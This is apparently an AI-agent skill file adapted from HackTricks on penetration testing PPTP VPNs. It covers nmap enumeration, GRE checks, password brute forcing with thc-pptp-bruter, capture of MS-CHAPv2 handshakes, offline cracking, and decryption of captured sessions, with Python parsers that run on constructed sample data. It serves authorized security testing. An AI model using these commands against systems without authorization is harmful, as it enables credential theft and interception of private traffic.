Hacktricks-skills pptp-pentesting

How to enumerate and pentest PPTP (Point-to-Point Tunneling Protocol) services on port 1723. Use this skill whenever the user mentions PPTP, port 1723, GRE protocol, remote access tunneling, or needs to assess PPTP security during authorized penetration testing. This skill covers enumeration, brute force attacks, and known PPTP vulnerabilities.

install
source · Clone the upstream repo
git clone https://github.com/abelrguezr/hacktricks-skills
manifest: skills/network-services-pentesting/1723-pentesting-pptp/SKILL.MD
source content

PPTP Pentesting

Point-to-Point Tunneling Protocol (PPTP) is a remote access VPN protocol that uses TCP port 1723 for the control connection and IP protocol 47 (GRE) to carry the tunneled PPP data. GRE itself provides no confidentiality: encryption, when enabled at all, is MPPE (RC4) applied to the PPP payload, and both the PPP authentication exchange (typically MS-CHAPv2) and the encrypted user traffic travel inside GRE, not on port 1723. This skill helps you enumerate and assess PPTP services during authorized penetration testing engagements.

⚠️ Authorization Required: Only use these techniques on systems you own or have explicit written permission to test.

When to Use This Skill

Use this skill when:

  • You discover port 1723 open during network scanning
  • You need to assess PPTP VPN security
  • You're testing remote access configurations
  • You encounter GRE protocol (IP 47) in firewall rules
  • You need to understand PPTP vulnerabilities and attack vectors

Enumeration

Basic Service Detection

Start by confirming PPTP is running and gathering service information:

# Basic PPTP enumeration (SYN scan plus version detection)
nmap -Pn -sSV -p1723 <target-ip>

# Grab the PPTP control-connection banner: the SCCRP carries hostname, vendor and firmware revision
nmap -Pn -sV -sT -p1723 --script pptp-version <target-ip>

# Default NSE scripts plus version detection on the control port
nmap -Pn -sC -sV -p1723 <target-ip>
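
The banner that nmap's pptp-version script reports comes from the Start-Control-Connection-Reply (SCCRP) the server sends in answer to a Start-Control-Connection-Request (SCCRQ). The probe below is an added example for this page, not code from the HackTricks skill or from nmap; it builds the 156-byte SCCRQ, decodes the SCCRP fields (RFC 2637 layout), and falls back to a constructed SAMPLE_SCCRP so it runs offline. The hostname "vpn-gw01" and vendor "Microsoft" in that sample are made up for the test.

```python
"""PPTP control-connection banner grab (what nmap's pptp-version script does).

Added example for this page; not part of the HackTricks skill or of nmap.
Message layout follows RFC 2637 (156-byte SCCRQ/SCCRP). SAMPLE_SCCRP is
constructed test data, not a real server reply.
"""
import socket
import struct

PPTP_MAGIC = 0x1A2B3C4D
MSG_CONTROL = 1                      # PPTP message type: control message
CTRL_SCCRQ, CTRL_SCCRP = 1, 2
SCCRQ_FMT = "!HHIHHHHIIHH64s64s"     # reserved1 is a 16-bit field in the request
SCCRP_FMT = "!HHIHHHBBIIHH64s64s"    # ...replaced by result code + error code in the reply
MSG_LEN = 156


def build_sccrq(hostname: bytes = b"pentest", vendor: bytes = b"probe") -> bytes:
    """Start-Control-Connection-Request: version 1.0, async framing, analog bearer."""
    return struct.pack(SCCRQ_FMT,
                       MSG_LEN, MSG_CONTROL, PPTP_MAGIC, CTRL_SCCRQ, 0,
                       0x0100, 0,      # protocol version 1.0, reserved1
                       1, 1,           # framing capabilities, bearer capabilities
                       0, 0,           # max channels, firmware revision
                       hostname, vendor)


def _cstr(field: bytes) -> str:
    """Decode a NUL-padded 64-byte string field."""
    return field.split(b"\x00", 1)[0].decode("ascii", errors="replace")


def parse_sccrp(data: bytes) -> dict:
    """Decode a Start-Control-Connection-Reply into the fields worth reporting."""
    if len(data) < MSG_LEN:
        raise ValueError(f"short PPTP control message ({len(data)} bytes)")
    (_length, msgtype, cookie, ctrltype, _r0, version, result, error,
     framing, bearer, maxchan, firmware, host, vendor) = struct.unpack(SCCRP_FMT, data[:MSG_LEN])
    if msgtype != MSG_CONTROL or cookie != PPTP_MAGIC:
        raise ValueError("not a PPTP control message (bad type or magic cookie)")
    if ctrltype != CTRL_SCCRP:
        raise ValueError(f"expected SCCRP (2), got control message type {ctrltype}")
    return {
        "version": f"{version >> 8}.{version & 0xFF}",
        "result_code": result,       # 1 = channel established, anything else = refused
        "error_code": error,
        "framing_caps": framing, "bearer_caps": bearer,
        "max_channels": maxchan, "firmware": firmware,
        "hostname": _cstr(host), "vendor": _cstr(vendor),
    }


def probe(host: str, port: int = 1723, timeout: float = 5.0) -> dict:
    """Connect to the PPTP control port, send an SCCRQ and decode the SCCRP."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_sccrq())
        buf = b""
        while len(buf) < MSG_LEN:
            chunk = s.recv(MSG_LEN - len(buf))
            if not chunk:
                raise ConnectionError("server closed the control connection early")
            buf += chunk
    return parse_sccrp(buf)


# Constructed SCCRP for offline use: a server that calls itself vpn-gw01.
SAMPLE_SCCRP = struct.pack(SCCRP_FMT,
                           MSG_LEN, MSG_CONTROL, PPTP_MAGIC, CTRL_SCCRP, 0,
                           0x0100, 1, 0, 3, 3, 1, 0x0100, b"vpn-gw01", b"Microsoft")

if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else None
    info = probe(target) if target else parse_sccrp(SAMPLE_SCCRP)
    for key, value in info.items():
        print(f"{key:>13}: {value}")
```

Run it with a target IP to query a live server, or with no argument to decode the constructed sample. A non-1 result code in the SCCRP means the server refused the control connection, which is worth noting in the report as it usually indicates the service is reachable but not accepting new sessions from your source.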

Check GRE Protocol

PPTP requires GRE (IP protocol 47) to function: the PPP session, including authentication, runs inside GRE, so a firewall that passes TCP/1723 but drops GRE leaves the service unusable and any credential testing impossible. Verify it's allowed:

# IP protocol scan (needs root/raw sockets): "open" means a GRE reply came back,
# "open|filtered" means no answer, which usually indicates GRE is being dropped
nmap -Pn -sO -p 47 <target-ip>

# Or watch for GRE traffic on the wire (ip[9] is the IP protocol field)
tcpdump -i <interface> -n 'ip[9] == 47'

Vulnerability Assessment

Known PPTP Weaknesses

PPTP has several well-documented vulnerabilities:

  1. MS-CHAPv2 Weakness: the NT-Response is three DES encryptions of the same challenge under keys sliced from the NT hash, so a captured exchange can be broken with a single 2^56 DES key search regardless of password strength (chapcrack plus CloudCracker, 2012), or with a wordlist using asleap or hashcat. Because the MPPE session keys are derived from the same NT hash, recovering it also decrypts the captured session.
  2. GRE and MPPE: GRE is encapsulation only. Encryption is MPPE (RC4 at 40, 56 or 128 bits) inside the PPP payload, it is optional, and servers may still accept PAP, CHAP or MS-CHAPv1, which are weaker again.
  3. Protocol Design Flaws: PPTP was designed in the 1990s; RC4 provides no per-packet integrity, MS-CHAPv1 and the original MPPE key handling were broken by Schneier and Mudge in 1998, and the MS-CHAPv2 revision only moved the weakness rather than removing it.

Attack Vectors

Brute Force Authentication

If PPTP accepts connections, attempt to enumerate valid credentials:

# hydra and medusa have no PPTP module; thc-pptp-bruter is the usual tool.
# Each guess runs over a real PPTP/GRE session, so GRE must be reachable,
# and Windows servers add a delay between failed attempts that limits the rate.
# Passwords are read from stdin, -u sets the username.
cat <wordlist> | thc-pptp-bruter -u <username> <target-ip>

# Verify a single credential (and whether MPPE is enforced) with the pptp-linux client
pptpsetup --create test --server <target-ip> --username <username> --password <password> --encrypt --start

Capture MS-CHAPv2 Handshake

To crack PPTP credentials, you need to capture the MS-CHAPv2 handshake. It is carried as PPP CHAP packets inside GRE, so a capture limited to TCP/1723 will not contain it:

  1. Get on the path between client and server (requires network access), or stand up a PPTP server the client will connect to
  2. Capture the authentication exchange using packet capture tools, making sure GRE (protocol 47) is included
  3. Extract the challenge/response pairs: the server's 16-byte authenticator challenge, the client's 16-byte peer challenge, the 24-byte NT-Response and the username
  4. Crack offline with chapcrack (DES search via CloudCracker) or with asleap/hashcat against a wordlist
# Capture the control channel AND the GRE-encapsulated PPP/CHAP exchange
tcpdump -i <interface> -s 0 -w pptp_capture.pcap 'host <target-ip> and (port 1723 or proto 47)'

# chapcrack pulls the MS-CHAPv2 exchange out of the pcap and prints the CloudCracker token ($99$...)
chapcrack parse -i pptp_capture.pcap

# Wordlist alternative: asleap reads PPTP MS-CHAPv2 exchanges straight from the pcap
asleap -r pptp_capture.pcap -W <wordlist>

# With the recovered NT hash the MPPE keys follow and the captured session can be decrypted
chapcrack decrypt -i pptp_capture.pcap -o decrypted.pcap -n <nt-hash>
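
The extraction step above, and the MS-CHAPv2 weakness listed under Known PPTP Weaknesses, are both easier to reason about with the packet layout in front of you. The following is an added example for this page, not code from the HackTricks skill, chapcrack, asleap or hashcat: it parses the PPP CHAP challenge and response packets, derives the 8-byte challenge the NT-Response was actually computed over (RFC 2759 ChallengeHash), emits the pair in hashcat's NetNTLMv1/MS-CHAPv2 mode 5500 format, and shows the three-DES-key split that makes the 2^56 attack work. The CHAP packets, the user "CORP\alice" and the server name "vpn-gw01" are constructed test data, and the NT-Response bytes are placeholders rather than real DES output.

```python
"""MS-CHAPv2 over PPTP: pull the challenge/response out of the PPP CHAP packets,
derive the 8-byte challenge the response was computed over, and emit a hashcat
-m 5500 line. Also shows why the NT-Response falls to one 2^56 DES search.

Added example for this page; not code from the HackTricks skill, chapcrack,
asleap or hashcat. The CHAP packets at the bottom are constructed test data.
"""
import hashlib
import struct

CHAP_CHALLENGE, CHAP_RESPONSE = 1, 2   # CHAP codes (RFC 1994); MS-CHAPv2 is RFC 2759


def parse_chap(pkt: bytes) -> dict:
    """Parse one PPP CHAP packet: code, id, length, value-size, value, name."""
    code, ident, length = struct.unpack("!BBH", pkt[:4])
    if not 5 <= length <= len(pkt):
        raise ValueError("bad CHAP length")
    value_size = pkt[4]
    value = pkt[5:5 + value_size]
    name = pkt[5 + value_size:length]
    if code == CHAP_CHALLENGE:
        if value_size != 16:
            raise ValueError("MS-CHAPv2 authenticator challenge must be 16 bytes")
        return {"code": code, "id": ident, "auth_challenge": value, "name": name}
    if code == CHAP_RESPONSE:
        # 49-byte value: 16 peer challenge | 8 reserved | 24 NT-Response | 1 flags
        if value_size != 49:
            raise ValueError("MS-CHAPv2 response value must be 49 bytes")
        return {"code": code, "id": ident, "peer_challenge": value[:16],
                "nt_response": value[24:48], "flags": value[48], "name": name}
    raise ValueError(f"unhandled CHAP code {code}")


def challenge_hash(peer_challenge: bytes, auth_challenge: bytes, username: bytes) -> bytes:
    """RFC 2759 ChallengeHash(): SHA1(PeerChallenge | AuthChallenge | UserName)[0:8].
    UserName is the account name only, so a DOMAIN\\ prefix is stripped."""
    user = username.split(b"\\")[-1]
    return hashlib.sha1(peer_challenge + auth_challenge + user).digest()[:8]


def hashcat_5500_line(challenge_pkt: bytes, response_pkt: bytes) -> str:
    """Pair a challenge with its response (same CHAP id) and format for hashcat -m 5500:
    user::::<24-byte NT-Response hex>:<8-byte derived challenge hex>."""
    chal, resp = parse_chap(challenge_pkt), parse_chap(response_pkt)
    if chal["code"] != CHAP_CHALLENGE or resp["code"] != CHAP_RESPONSE:
        raise ValueError("need one challenge packet and one response packet")
    if chal["id"] != resp["id"]:
        raise ValueError("challenge/response identifier mismatch")
    derived = challenge_hash(resp["peer_challenge"], chal["auth_challenge"], resp["name"])
    user = resp["name"].split(b"\\")[-1].decode("ascii", errors="replace")
    return f"{user}::::{resp['nt_response'].hex()}:{derived.hex()}"


def des_keys_from_nt_hash(nt_hash: bytes) -> tuple:
    """NT-Response = DES(K1,C) | DES(K2,C) | DES(K3,C), K1..K3 being the 7-byte slices of
    NTHash padded to 21 bytes. K3 holds only 2 unknown bytes (2^16 guesses); K1 and K2 are
    then found together by one 2^56 DES key search, whatever the password's strength."""
    if len(nt_hash) != 16:
        raise ValueError("NT hash is 16 bytes")
    padded = nt_hash + b"\x00" * 5
    return padded[0:7], padded[7:14], padded[14:21]


# --- constructed test vectors (not from a real capture) ---
def _chap_packet(code: int, ident: int, value: bytes, name: bytes) -> bytes:
    return struct.pack("!BBHB", code, ident, 5 + len(value) + len(name), len(value)) + value + name

AUTH_CHALLENGE = bytes(range(0x10, 0x20))   # 16 bytes from the server
PEER_CHALLENGE = bytes(range(0xA0, 0xB0))   # 16 bytes from the client
NT_RESPONSE = bytes(range(0x30, 0x48))      # 24 bytes; placeholder, not real DES output
CHALLENGE_PKT = _chap_packet(CHAP_CHALLENGE, 7, AUTH_CHALLENGE, b"vpn-gw01")
RESPONSE_PKT = _chap_packet(CHAP_RESPONSE, 7,
                            PEER_CHALLENGE + b"\x00" * 8 + NT_RESPONSE + b"\x00",
                            b"CORP\\alice")

if __name__ == "__main__":
    print(hashcat_5500_line(CHALLENGE_PKT, RESPONSE_PKT))
    k1, k2, k3 = des_keys_from_nt_hash(bytes(range(16)))
    print("K3 =", k3.hex(), "(only the first two bytes are secret)")
```

Feed the printed line to hashcat with -m 5500 and a wordlist for the cheap route. The key split is the reason the wordlist is optional: once K3 is brute-forced, every candidate for the remaining 56-bit DES key can be checked against both of the other two ciphertext blocks in the same pass, which is the single DES search chapcrack hands to CloudCracker.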

Testing Checklist

When assessing PPTP security, verify:

  • Port 1723 is accessible
  • GRE protocol (IP 47) is allowed through firewalls
  • Service version and banner information
  • Authentication mechanisms accepted (PAP, CHAP, MS-CHAPv1, MS-CHAPv2, EAP) and whether the weaker ones are refused
  • Whether MPPE encryption is actually required, and at what key length
  • Default or weak credentials
  • Certificate validation (if using EAP)

Reporting

When documenting PPTP findings:

  1. Risk Level: PPTP is generally considered high risk due to inherent protocol weaknesses
  2. Recommendation: Migrate to more secure protocols (OpenVPN, WireGuard, IKEv2)
  3. Evidence: Include nmap output, captured handshakes (if applicable), and successful authentication attempts
  4. Remediation: Disable PPTP, implement modern VPN solutions

Tools Reference

Tool             Purpose
nmap             Service/version detection (pptp-version NSE script) and GRE reachability (-sO)
tcpdump          Capture of the control channel and the GRE-encapsulated PPP authentication exchange
chapcrack        Extracts MS-CHAPv2 exchanges from a pcap, produces the CloudCracker token, decrypts MPPE with a recovered NT hash
asleap / hashcat Offline wordlist cracking of MS-CHAPv2 challenge/response pairs
thc-pptp-bruter  Online password guessing against a PPTP server (hydra and medusa have no PPTP module)
p0f              Passive TCP/IP stack fingerprinting of the endpoint's OS (not PPTP-specific)

Important Notes

  • PPTP is deprecated and should not be used for sensitive data
  • Even with strong passwords, a captured MS-CHAPv2 exchange can be broken offline with a 2^56 DES search; password strength only defeats the wordlist route
  • GRE traffic may be blocked by modern firewalls and NAT devices
  • Many modern systems no longer support PPTP by default

Next Steps

After initial enumeration:

  1. Document all findings
  2. Attempt authorized authentication testing
  3. Capture handshakes if MITM position is available
  4. Assess the impact of any successful attacks
  5. Recommend migration to secure alternatives